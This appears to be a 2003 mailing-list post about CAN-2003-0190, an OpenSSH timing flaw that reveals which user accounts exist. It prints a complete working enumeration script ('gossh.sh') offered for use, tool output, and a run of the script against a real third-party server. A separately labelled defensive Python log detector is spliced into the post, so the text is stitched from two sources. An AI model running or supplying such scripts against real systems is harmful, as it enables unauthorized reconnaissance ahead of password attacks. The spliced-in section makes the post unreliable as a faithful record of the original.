From: nc at stormvault.net (Nicolas Couture)
Subject: CAN-2003-0190 - OpenSSH <= 3.6.1p1

After my 

--- experience ---
bash-2.05a$ ./a.out

 SSH_BRUTE - OpenSSH/PAM <= 3.6.1p1 remote users discovery tool
 Copyright (c) 2003 @ Mediaservice.net Srl. All rights reserved

 Usage: ./a.out <protocol version> <user file> <host>

bash-2.05a$ echo root > file
bash-2.05a$ ./a.out 2 file 0

 SSH_BRUTE - OpenSSH/PAM <= 3.6.1p1 remote users discovery tool
 Copyright (c) 2003 @ Mediaservice.net Srl. All rights reserved

 Testing an illegal user        : sh: ./ssh: No such file or directory
sh: ./ssh: No such file or directory
sh: ./ssh: No such file or directory
127 second(s)

 Testing login root             : sh: ./ssh: No such file or directory
ILLEGAL [127 second(s)]

bash-2.05a$ cp `which ssh` .
bash-2.05a$ ./a.out 2 file 0

 SSH_BRUTE - OpenSSH/PAM <= 3.6.1p1 remote users discovery tool
 Copyright (c) 2003 @ Mediaservice.net Srl. All rights reserved

 Testing an illegal user        : not_val_user@0's password: # here I had to type enter manually (????)
Permission denied, please try again.
not_val_user@0's password: # and so here as well as all other password prompts
Permission denied, please try again.
not_val_user@0's password:
Permission denied (publickey,password,keyboard-interactive).
not_val_user@0's password:
Permission denied, please try again.
not_val_user@0's password:
Permission denied, please try again.
not_val_user@0's password:
Permission denied (publickey,password,keyboard-interactive).
not_val_user@0's password:
Permission denied, please try again.
not_val_user@0's password:
Permission denied, please try again.
not_val_user@0's password:
Permission denied (publickey,password,keyboard-interactive).
255 second(s)

 Testing login root             : root@0's password:
Permission denied, please try again.
root@0's password:
Permission denied, please try again.
root@0's password:
Permission denied (publickey,password,keyboard-interactive).
ILLEGAL [255 second(s)]

bash-2.05a$
--- experience ---

with ssh_brute.c from mediaservice.net, who recently released an advisory
for OpenSSH <= 3.6.1p1 that became CAN-2003-0190
(http://lab.mediaservice.net/advisory/2003-01-openssh.txt), I decided to
write my own working exploit:

--- gossh.sh ---
#!/bin/sh
# OpenSSH <= 3.6.1p1 - User Identification.
# Nicolas Couture - nc@...rmvault.net
#
# Description:
#	-Tells you whether or not a user exists on
#	  a distant server running OpenSSH.
#
# Usage:
#	-You NEED to have the host's public key
#	  before executing this script.
#	-Requires expect(1) on the local box.
#


#=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=#
# Fact Sheet:                                   #
#   o It is really accurate against             #
#     redhat boxes.                             #
#   o Linux boxes running grsecurity            #
#     have a 10 second delay on both            #
#     valid AND invalid user login              #
#     attempts.                                 #
#   o *BSD boxes are not vulnerable and         #
#     always have a 10 second delay like        #
#     Linux-Grsec + network protection          #
#                                               #
#=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=#

#=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=#
# History:                                  #
#   Thu May  1 15:41:18 EDT 2003            #
#     ; Script started.                     #
#   Thu May  1 16:42:30 EDT 2003            #
#     ; Script is functional.               #
#=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=#

# Let the user know how we work.
usage(){
 echo "$0 <user> <host>"
 exit 1
}

# Verify the arguments.
[ $# != 2 ] && usage

# Variables.
USER="$1"
HOST="$2"

#=-=-=-=-=-=-=-=-=-=-=-=-=#
# Expect script functions #
#=-=-=-=-=-=-=-=-=-=-=-=-=#

# Expect script for password: spawn the ssh client, wait for the
# password prompt, answer it with an empty line (Tcl needs double
# quotes here, '\r' would send the quote characters too), then hand
# the session over to the enclosing expect script.
expasswd() {
cat << EOF > expasswd
spawn $SSHCMD
expect password:
send "\r"
interact
EOF
}

# Expect script for error: run the password script and return as
# soon as sshd answers "Permission denied, please try again."
# Note that expect's default timeout is 10 seconds, so a host that
# never sends that string (or sends it late) always measures as 10.
experror() {
cat << EOF > experror
spawn expect -f expasswd
expect again.
exit 1593
interact
EOF
}

#=-=-=-=-=-=-=-=-=-=#
# -Fake user timing #
#=-=-=-=-=-=-=-=-=-=#

# OpenSSH client command for a user that does not exist.
export SSHCMD="ssh nicolas_couture@$HOST"

# Build new expect scripts.
expasswd
experror

# Timing.
FDATE0=`date '+%s'`
echo "[-] Calculating fake user timeout..."
expect -f experror 1> /dev/null 2> /dev/null
FDATE1=`date '+%s'`

# Fake user timeout, in seconds.
FUTO=$((FDATE1 - FDATE0))
echo "[+] Found $FUTO second(s)."

#=-=-=-=-=-=-=-=#
# -$USER timing #
#=-=-=-=-=-=-=-=#

# OpenSSH command.
export SSHCMD="ssh $USER@$HOST"

# Build new expect scripts.
expasswd
experror

DATE0=`date '+%s'`
echo "[-] Calculating $USER timeout on $HOST..."
expect -f experror 1> /dev/null 2> /dev/null
DATE1=`date '+%s'`

# $USER timeout, in seconds.
END=$((DATE1 - DATE0))
echo "[+] Found $END second(s)."

#=-=-=-=-=#
# -Result #
#=-=-=-=-=#

# Both logins hit the same 10 second figure: timing tells us nothing.
if [ "$FUTO" -eq "$END" ] && [ "$FUTO" -eq "10" ]; then
 echo "This box is not vulnerable."
 rm -f expasswd experror
 exit 1
fi

# Use of our magic skills.
if [ "$FUTO" -lt "$END" ]; then
 echo "$USER exists on $HOST."
elif [ "$FUTO" -ge "$END" ]; then
 echo "$USER doesn't exist on $HOST."
else
 echo "Segmentation fault."
 exit 13
fi

# Remove tmp files.
rm -f expasswd experror

# EOF
--- gossh.sh ---

Interesting things you can find with this script...

--- snip ---
bash-2.05a$ ./gossh.sh linux kernel.org
[-] Calculating fake user timeout...
[+] Found 1.
[-] Calculating linux timeout on kernel.org...
[+] Found 1.
linux doesn't exist on kernel.org.
bash-2.05a$ finger linux@...nel.org
The latest stable version of the Linux kernel is:           2.4.20
The latest prepatch for the stable Linux kernel tree is:    2.4.21-rc1
The latest beta version of the Linux kernel is:             2.5.68
The latest snapshot for the beta Linux kernel tree is:      2.5.68-bk11
The latest 2.2 version of the Linux kernel is:              2.2.25
The latest 2.0 version of the Linux kernel is:              2.0.39
The latest prepatch for the 2.0 Linux kernel tree is:       2.0.40-rc6
The latest -ac patch to the stable Linux kernels is:        2.4.21-rc1-ac3
The latest -ac patch to the beta Linux kernels is:          2.5.67-ac2
The latest -dj patch to the beta Linux kernels is:          2.5.60-dj2
--- snip ---

This is a sign that the finger daemon has been hacked by some kernel.org
people :)
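As an added example that is not part of the original post: the defender's side of the same pattern. This small Python detector runs over constructed sshd auth log lines (all names and addresses are made up) and separates the one-try-per-name shape gossh.sh leaves behind in the logs from ordinary password guessing against a single account.

```python
import re
from collections import defaultdict

# OpenSSH password-failure syslog line; "invalid user" appears only when
# the account does not exist on the server.
FAIL_RE = re.compile(
    r"Failed (?:password|none) for (?P<invalid>invalid user )?(?P<user>\S+) "
    r"from (?P<ip>[0-9a-fA-F.:]+) port \d+"
)

# Constructed sample: 192.0.2.10 probes five names once each (the gossh.sh
# pattern), 198.51.100.7 guesses two passwords for one account.
SAMPLE_LOG = """\
May  1 16:50:01 srv sshd[2101]: Failed password for invalid user nicolas_couture from 192.0.2.10 port 40112 ssh2
May  1 16:50:04 srv sshd[2103]: Failed password for linux from 192.0.2.10 port 40113 ssh2
May  1 16:50:07 srv sshd[2105]: Failed password for invalid user www from 192.0.2.10 port 40114 ssh2
May  1 16:50:10 srv sshd[2107]: Failed password for admin from 192.0.2.10 port 40115 ssh2
May  1 16:50:13 srv sshd[2109]: Failed password for invalid user test from 192.0.2.10 port 40116 ssh2
May  1 16:51:00 srv sshd[2111]: Failed password for root from 198.51.100.7 port 51000 ssh2
May  1 16:51:02 srv sshd[2111]: Failed password for root from 198.51.100.7 port 51000 ssh2
"""

def summarize(log_text):
    """Per source IP: failed attempts, distinct names tried, names sshd called invalid."""
    stats = defaultdict(lambda: {"attempts": 0, "users": set(), "invalid": set()})
    for line in log_text.splitlines():
        m = FAIL_RE.search(line)
        if not m:
            continue
        s = stats[m["ip"]]
        s["attempts"] += 1
        s["users"].add(m["user"])
        if m["invalid"]:
            s["invalid"].add(m["user"])
    return stats

def enumeration_sources(log_text, min_users=4, max_tries_per_user=2):
    """IPs showing 'many names, one or two tries each' (enumeration), as
    opposed to 'one name, many tries' (password guessing)."""
    flagged = []
    for ip, s in summarize(log_text).items():
        n = len(s["users"])
        if n >= min_users and s["attempts"] / n <= max_tries_per_user:
            flagged.append(ip)
    return sorted(flagged)

if __name__ == "__main__":
    for ip in enumeration_sources(SAMPLE_LOG):
        print("possible SSH user enumeration from", ip)
```

The thresholds are deliberately loose; on a real host tune `min_users` to the number of distinct accounts a legitimate source ever tries.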


Links: 
	-http://lab.mediaservice.net/advisory/2003-01-openssh.txt
	-http://lab.mediaservice.net/code/ssh_brute.c


